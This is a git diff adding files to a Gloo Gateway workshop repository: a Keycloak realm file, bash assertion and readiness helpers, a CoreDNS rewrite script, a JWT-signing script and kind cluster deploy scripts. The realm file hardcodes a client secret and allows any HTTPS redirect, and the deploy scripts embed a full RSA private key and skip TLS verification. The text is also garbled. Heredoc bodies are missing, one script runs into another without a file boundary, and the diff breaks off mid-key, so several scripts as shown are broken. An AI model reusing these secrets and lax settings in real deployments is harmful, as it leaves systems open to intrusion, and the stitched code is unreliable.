b/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json new file mode 100644 index 0000000000..943594c294 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/data/steps/deploy-keycloak-docker/keycloak-realm.json @@ -0,0 +1,108 @@ +{ + "realm": "workshop", + "enabled": true, + "displayName": "solo.io", + "accessTokenLifespan": 1800, + 
"sslRequired": "none", + "users": [ + { + "username": "user1", + "enabled": true, + "email": "user1@example.com", + "attributes": { + "group": [ + "users" + ] + }, + "credentials": [ + { + "type": "password", + "secretData": "{\"value\":\"JsfNbCOIdZUbyBJ+BT+VoGI91Ec2rWLOvkLPDaX8e9k=\",\"salt\":\"P5rtFkGtPfoaryJ6PizUJw==\",\"additionalParameters\":{}}", + "credentialData": "{\"hashIterations\":27500,\"algorithm\":\"pbkdf2-sha256\",\"additionalParameters\":{}}" + } + ] + }, + { + "username": "user2", + "enabled": true, + "email": "user2@solo.io", + "attributes": { + "group": [ + "users" + ], + "show_personal_data": [ + "false" + ] + }, + "credentials": [ + { + "type": "password", + "secretData": "{\"value\":\"RITBVPdh5pvXOa4JzJ5pZTE0rG96zhnQNmSsKCf83aU=\",\"salt\":\"drB9e5Smf3cbfUfF3FUerw==\",\"additionalParameters\":{}}", + "credentialData": "{\"hashIterations\":27500,\"algorithm\":\"pbkdf2-sha256\",\"additionalParameters\":{}}" + } + ] + } + ], + "clients": [ + { + "clientId": "gloo-ext-auth", + "secret": "hKcDcqmUKCrPkyDJtCw066hTLzUbAiri", + "redirectUris": [ + "https://*" + ], + "webOrigins": [ + "+" + ], + "authorizationServicesEnabled": true, + "directAccessGrantsEnabled": true, + "serviceAccountsEnabled": true, + "protocolMappers": [ + { + "name": "group", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-attribute-mapper", + "config": { + "claim.name": "group", + "user.attribute": "group", + "access.token.claim": "true", + "id.token.claim": "true" + } + }, + { + "name": "show_personal_data", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-attribute-mapper", + "config": { + "claim.name": "show_personal_data", + "user.attribute": "show_personal_data", + "access.token.claim": "true", + "id.token.claim": "true" + } + }, + { + "name": "name", + "protocol": "openid-connect", + "protocolMapper": "oidc-usermodel-property-mapper", + "config": { + "claim.name": "name", + "user.attribute": "username", + "access.token.claim": "true", 
+ "id.token.claim": "true" + } + } + ] + } + ], + "components": { + "org.keycloak.userprofile.UserProfileProvider": [ + { + "providerId": "declarative-user-profile", + "config": { + "kc.user.profile.config": [ + "{\"attributes\":[{\"name\":\"username\"},{\"name\":\"email\"}],\"unmanagedAttributePolicy\":\"ENABLED\"}" + ] + } + } + ] + } +} \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/.gitkeep b/gloo-gateway/1-18/enterprise-vm/default/images/.gitkeep new file mode 100644 index 0000000000..e69de29bb2 diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg new file mode 100644 index 0000000000..163b09fd91 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg @@ -0,0 +1,14 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg new file mode 100644 index 0000000000..322368db75 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png b/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png new file mode 100644 index 0000000000..707c843e13 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png new file mode 100644 index 0000000000..0fa184c849 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png 
b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png new file mode 100644 index 0000000000..0397ad2698 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png new file mode 100644 index 0000000000..b2048a65fb Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg new file mode 100644 index 0000000000..dbc20ca046 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png b/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png new file mode 100644 index 0000000000..76858d10b7 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png b/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png new file mode 100644 index 0000000000..5a2249e81e Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg b/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg new file mode 100644 index 0000000000..48ca244b66 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg @@ -0,0 +1,16 @@ + + + + + + + UpstreamClientOrder of filters applied to trafficFaultTransformationCORSDLPWAFRate 
limitingSanitizeExternal authJWTRBACgRPC-webTransformationRate limitingCSRFRouterJWT123Legend5External authenticationfor client requests.Filters you can applybefore or after external auth.Filters you can apply only beforeexternal auth.Router to add or removeheaders, rewrites, and other policies.4Filters you can apply only afterexternal auth. \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg new file mode 100644 index 0000000000..9cca3ca903 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg @@ -0,0 +1,14 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg new file mode 100644 index 0000000000..9ca81f8a17 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh new file mode 100755 index 0000000000..75ba95ac90 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh @@ -0,0 +1,252 @@ +#!/usr/bin/env bash + +##################################################################### +## +## title: Assert Extension +## +## description: +## Assert extension of shell (bash, ...) +## with the common assert functions +## Function list based on: +## http://junit.sourceforge.net/javadoc/org/junit/Assert.html +## Log methods : inspired by +## - https://natelandau.com/bash-scripting-utilities/ +## author: Mark Torok +## +## date: 07. Dec. 
2016 +## +## license: MIT +## +##################################################################### + +if command -v tput &>/dev/null && tty -s; then + RED=$(tput setaf 1) + GREEN=$(tput setaf 2) + MAGENTA=$(tput setaf 5) + NORMAL=$(tput sgr0) + BOLD=$(tput bold) +else + RED=$(echo -en "\e[31m") + GREEN=$(echo -en "\e[32m") + MAGENTA=$(echo -en "\e[35m") + NORMAL=$(echo -en "\e[00m") + BOLD=$(echo -en "\e[01m") +fi + +log_header() { + printf "\n${BOLD}${MAGENTA}========== %s ==========${NORMAL}\n" "$@" >&2 +} + +log_success() { + printf "${GREEN}✔ %s${NORMAL}\n" "$@" >&2 +} + +log_failure() { + printf "${RED}✖ %s${NORMAL}\n" "$@" >&2 + file=.test-error.log + echo "$@" >> $file + echo "#############################################" >> $file + echo "#############################################" >> $file +} + + +assert_eq() { + local expected="$1" + local actual="$2" + local msg="${3-}" + + if [ "$expected" == "$actual" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$expected == $actual :: $msg" || true + return 1 + fi +} + +assert_not_eq() { + local expected="$1" + local actual="$2" + local msg="${3-}" + + if [ ! "$expected" == "$actual" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$expected != $actual :: $msg" || true + return 1 + fi +} + +assert_true() { + local actual="$1" + local msg="${2-}" + + assert_eq true "$actual" "$msg" + return "$?" +} + +assert_false() { + local actual="$1" + local msg="${2-}" + + assert_eq false "$actual" "$msg" + return "$?" +} + +assert_array_eq() { + + declare -a expected=("${!1-}") + # echo "AAE ${expected[@]}" + + declare -a actual=("${!2}") + # echo "AAE ${actual[@]}" + + local msg="${3-}" + + local return_code=0 + if [ ! "${#expected[@]}" == "${#actual[@]}" ]; then + return_code=1 + fi + + local i + for (( i=1; i < ${#expected[@]} + 1; i+=1 )); do + if [ ! 
"${expected[$i-1]}" == "${actual[$i-1]}" ]; then + return_code=1 + break + fi + done + + if [ "$return_code" == 1 ]; then + [ "${#msg}" -gt 0 ] && log_failure "(${expected[*]}) != (${actual[*]}) :: $msg" || true + fi + + return "$return_code" +} + +assert_array_not_eq() { + + declare -a expected=("${!1-}") + declare -a actual=("${!2}") + + local msg="${3-}" + + local return_code=1 + if [ ! "${#expected[@]}" == "${#actual[@]}" ]; then + return_code=0 + fi + + local i + for (( i=1; i < ${#expected[@]} + 1; i+=1 )); do + if [ ! "${expected[$i-1]}" == "${actual[$i-1]}" ]; then + return_code=0 + break + fi + done + + if [ "$return_code" == 1 ]; then + [ "${#msg}" -gt 0 ] && log_failure "(${expected[*]}) == (${actual[*]}) :: $msg" || true + fi + + return "$return_code" +} + +assert_empty() { + local actual=$1 + local msg="${2-}" + + assert_eq "" "$actual" "$msg" + return "$?" +} + +assert_not_empty() { + local actual=$1 + local msg="${2-}" + + assert_not_eq "" "$actual" "$msg" + return "$?" +} + +assert_contain() { + local haystack="$1" + local needle="${2-}" + local msg="${3-}" + + if [ -z "${needle:+x}" ]; then + return 0; + fi + + if [ -z "${haystack##*$needle*}" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$haystack doesn't contain $needle :: $msg" || true + return 1 + fi +} + +assert_not_contain() { + local haystack="$1" + local needle="${2-}" + local msg="${3-}" + + if [ -z "${needle:+x}" ]; then + return 0; + fi + + if [ "${haystack##*$needle*}" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$haystack contains $needle :: $msg" || true + return 1 + fi +} + +assert_gt() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -gt "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first > $second :: $msg" || true + return 1 + fi +} + +assert_ge() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -ge "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 
] && log_failure "$first >= $second :: $msg" || true + return 1 + fi +} + +assert_lt() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -lt "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first < $second :: $msg" || true + return 1 + fi +} + +assert_le() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -le "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first <= $second :: $msg" || true + return 1 + fi +} \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh new file mode 100755 index 0000000000..fa52484b28 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh @@ -0,0 +1,16 @@ +#!/usr/bin/env bash + +printf "Waiting for all the kube-system pods to become ready in context $1" +until [ $(kubectl --context $1 -n kube-system get pods -o jsonpath='{range .items[*].status.containerStatuses[*]}{.ready}{"\n"}{end}' | grep false -c) -eq 0 ]; do + printf "%s" "." + sleep 1 +done +printf "\n kube-system pods are now ready \n" + +printf "Waiting for all the metallb-system pods to become ready in context $1" +until [ $(kubectl --context $1 -n metallb-system get pods -o jsonpath='{range .items[*].status.containerStatuses[*]}{.ready}{"\n"}{end}' | grep false -c) -eq 0 ]; do + printf "%s" "." 
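The `assert.sh` helpers above all follow the same contract: return 0 when the check passes, log through `log_failure` and return 1 otherwise, so they compose naturally with `&&` and `||`. A minimal standalone sketch of that contract (the function bodies are inlined stand-ins so the example runs on its own; the real library adds colored failure messages and the `.test-error.log` file):

```shell
#!/usr/bin/env bash
# Inlined stand-ins for assert_eq and assert_contain from assert.sh,
# reduced to their return-code behavior for illustration.
assert_eq() { [ "$1" == "$2" ]; }
assert_contain() { case "$1" in *"$2"*) true ;; *) false ;; esac; }

assert_eq "$(printf '%02d' 7)" "07" && echo "eq ok"
assert_contain "kind-kind01" "kind01" && echo "contain ok"
assert_eq "foo" "bar" || echo "mismatch detected"
```

In the workshop scripts these helpers are sourced and pointed at `curl` or `kubectl` output, so a failed check prints a readable message instead of a bare non-zero exit.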
+  sleep 1
+done
+printf "\n metallb-system pods are now ready \n"
+
diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh
new file mode 100755
index 0000000000..d6e684c9da
--- /dev/null
+++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh
@@ -0,0 +1,93 @@
+#!/usr/bin/env bash
+
+set -x # Debug mode to show commands
+set -e # Stop on error
+
+hostname="$1"
+new_hostname="$2"
+
+## Install CoreDNS if not installed
+if ! command -v coredns &> /dev/null; then
+  wget https://github.com/coredns/coredns/releases/download/v1.8.3/coredns_1.8.3_linux_amd64.tgz
+  tar xvf coredns_1.8.3_linux_amd64.tgz
+  sudo mv coredns /usr/local/bin/
+  sudo rm -rf coredns_1.8.3_linux_amd64.tgz
+fi
+
+name="$(echo {a..z} | tr -d ' ' | fold -w1 | shuf | head -n3 | tr -d '\n')"
+tld=$(echo {a..z} | tr -d ' ' | fold -w1 | shuf | head -n2 | tr -d '\n')
+random_domain="$name.$tld"
+CONFIG_FILE=~/coredns.conf
+
+## Update coredns.conf with a rewrite rule
+if grep -q "rewrite name $hostname" $CONFIG_FILE; then
+  sed -i "s/rewrite name $hostname.*/rewrite name $hostname $new_hostname/" $CONFIG_FILE
+else
+  if [ ! -f "$CONFIG_FILE" ]; then
+    # Create a new config file if it doesn't exist
+    cat <<EOF > $CONFIG_FILE
+.:5300 {
+  forward . 
8.8.8.8 8.8.4.4
+  log
+}
+EOF
+  fi
+  # Append a new rewrite rule
+  sed -i "/log/i \ rewrite name $hostname $new_hostname" $CONFIG_FILE
+fi
+
+# Ensure the random domain rewrite rule is always present
+if grep -q "rewrite name .* httpbin.org" $CONFIG_FILE; then
+  sed -i "s/rewrite name .* httpbin.org/rewrite name $random_domain httpbin.org/" $CONFIG_FILE
+else
+  sed -i "/log/i \ rewrite name $random_domain httpbin.org" $CONFIG_FILE
+fi
+
+cat $CONFIG_FILE # Display the config for debugging
+
+## Check if CoreDNS is running and kill it
+if pgrep coredns; then
+  pkill coredns
+  # wait for the process to be terminated
+  sleep 10
+fi
+
+## Restart CoreDNS with the updated config
+nohup coredns -conf $CONFIG_FILE &> /dev/null &
+
+## Configure the system resolver
+sudo tee /etc/systemd/resolved.conf > /dev/null < /dev/null || ! command -v jq &> /dev/null; then
+  echo "Both openssl and jq are required to run this script."
+  exit 1
+fi
+
+PRIVATE_KEY_PATH=$1
+SUBJECT=$2
+TEAM=$3
+LLM=$4
+MODEL=$5
+
+if [ -z "$PRIVATE_KEY_PATH" ] || [ -z "$SUBJECT" ] || [ -z "$TEAM" ] || [ -z "$LLM" ] || [ -z "$MODEL" ]; then
+  echo "Usage: $0 <private_key_path> <subject> <team> <llm> <model>"
+  exit 1
+fi
+
+
+if [[ "$LLM" != "openai" && "$LLM" != "mistral" ]]; then
+  echo "LLM must be either 'openai' or 'mistral'."
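The JWT this script assembles is three base64url segments joined by dots, so reversing that encoding is enough to inspect a token's claims. A standalone sketch assuming only coreutils (the sample segment is an illustrative payload, not a real signed token):

```shell
#!/usr/bin/env bash
# Decode a single base64url JWT segment (a payload here; the header
# decodes the same way). The sample value encodes {"sub":"user1"}.
segment="eyJzdWIiOiJ1c2VyMSJ9"

# Restore the '=' padding stripped during base64url encoding, then map
# the URL-safe alphabet back to standard base64 before decoding.
pad=$(( (4 - ${#segment} % 4) % 4 ))
padding=""
if [ "$pad" -gt 0 ]; then padding=$(printf '=%.0s' $(seq 1 $pad)); fi
echo "${segment}${padding}" | tr '_-' '/+' | base64 -d
# -> {"sub":"user1"}
```

This is simply the inverse of the script's `base64url_encode` helper, which strips `=` and translates `/+` to `_-`.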
+ exit 1 +fi + +HEADER='{"alg":"RS256","typ":"JWT"}' +PAYLOAD=$(jq -n --arg sub "$SUBJECT" --arg team "$TEAM" --arg llm "$LLM" --arg model "$MODEL" \ +'{ + "iss": "solo.io", + "org": "solo.io", + "sub": $sub, + "team": $team, + "llms": { + ($llm): [$model] + } +}') + +# Encode Base64URL function +base64url_encode() { + openssl base64 -e | tr -d '=' | tr '/+' '_-' | tr -d '\n' +} + +# Create JWT Header +HEADER_BASE64=$(echo -n $HEADER | base64url_encode) + +# Create JWT Payload +PAYLOAD_BASE64=$(echo -n $PAYLOAD | base64url_encode) + +# Create JWT Signature +SIGNING_INPUT="${HEADER_BASE64}.${PAYLOAD_BASE64}" +SIGNATURE=$(echo -n $SIGNING_INPUT | openssl dgst -sha256 -sign $PRIVATE_KEY_PATH | base64url_encode) + +# Combine all parts to get the final JWT token +JWT_TOKEN="${SIGNING_INPUT}.${SIGNATURE}" + +# Output the JWT token +echo $JWT_TOKEN diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh new file mode 100755 index 0000000000..e4df4bcd38 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh @@ -0,0 +1,254 @@ +#!/usr/bin/env bash +set -o errexit + +number=$1 +name=$2 +region=$3 +zone=$4 +twodigits=$(printf "%02d\n" $number) +kindest_node=${KINDEST_NODE:-kindest\/node:v1.28.0@sha256:b7a4cad12c197af3ba43202d3efe03246b3f0793f162afb40a33c923952d5b31} + +if [ -z "$3" ]; then + region=us-east-1 +fi + +if [ -z "$4" ]; then + zone=us-east-1a +fi + +if hostname -I 2>/dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! 
kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA +1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 ++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY 
+FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh +SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc +r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv +z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn +7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy +3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8 +PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy +72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw +BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo +hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn +WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+ +y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI +KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39 +0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR +f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN +b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc +Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd +qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q== +-----END RSA PRIVATE KEY----- +EOF + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + extraMounts: + - containerPath: /etc/kubernetes/oidc + hostPath: /tmp/oidc + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +kubeadmConfigPatches: +- | + kind: ClusterConfiguration + apiServer: + extraArgs: + service-account-key-file: /etc/kubernetes/pki/sa.pub + service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub + 
service-account-signing-key-file: /etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: + - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. 
'{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +curl -sL https://raw.githubusercontent.com/projectcalico/calico/v3.28.1/manifests/calico.yaml | sed 's/250m/50m/g' | kubectl --context kind-kind${number} apply -f - + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " 
$i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA 